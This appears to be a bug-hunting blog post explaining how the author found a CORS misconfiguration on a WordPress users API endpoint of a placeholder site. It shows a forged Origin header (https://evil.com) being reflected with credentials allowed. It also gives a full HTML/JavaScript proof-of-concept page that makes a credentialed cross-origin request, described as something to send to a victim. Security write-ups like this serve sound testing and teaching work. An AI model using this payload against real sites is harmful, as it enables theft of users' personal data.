How I found CORS Vulnerability while Hunting Web-Site
Intro : Welcome to my new Article on Bug Hunting. Here I will discuss how I find CORS Vulnerability while Hunting a Web Application. Here we will assume the Domain : example.com. So let’s start.
Hack it :
So I first go this Website example.com and go to this Path /wp-json/wp/v2/users where I get all Users Information. Then I intercept the Request in my BurpSuite and sent it into Repeater.
So here I first try for CORS if it access any External Site. Because I found here some Origin specifies.
So I put a Origin Header in my Request and set it with a Random Website.
Tip : Origin: https://evil.com
And after I send the Request it reflects back 200 status code with a Header Access-Control-Allow-Origin: https:///evil.com and Access-Control-Allow-Credentials: True that means it accept that External site in it’s Origin without Blocking and it violates the SOP.
And I also get which Methods we can use it that Web-Page almost Everything. And the content is as same.
Here I give you the POC :
<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC</h2>
<h3>Extract SID</h3>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200){
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "https://example.com/wp-json/wp/v2/users", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>Here you can run it in your Browser specifying the Vulnerable Site which can be sent to Victim for triggering the Vulnerability.
Impact :
Attackers can use CORS vulnerabilities to steal sensitive data from applications like API keys, SSH keys, Personal identifiable information (PII), or users’ credentials.
THANKS FOR READING!!
If you like it don’t forget to Follow me for more Articles.
Happy Hacking~
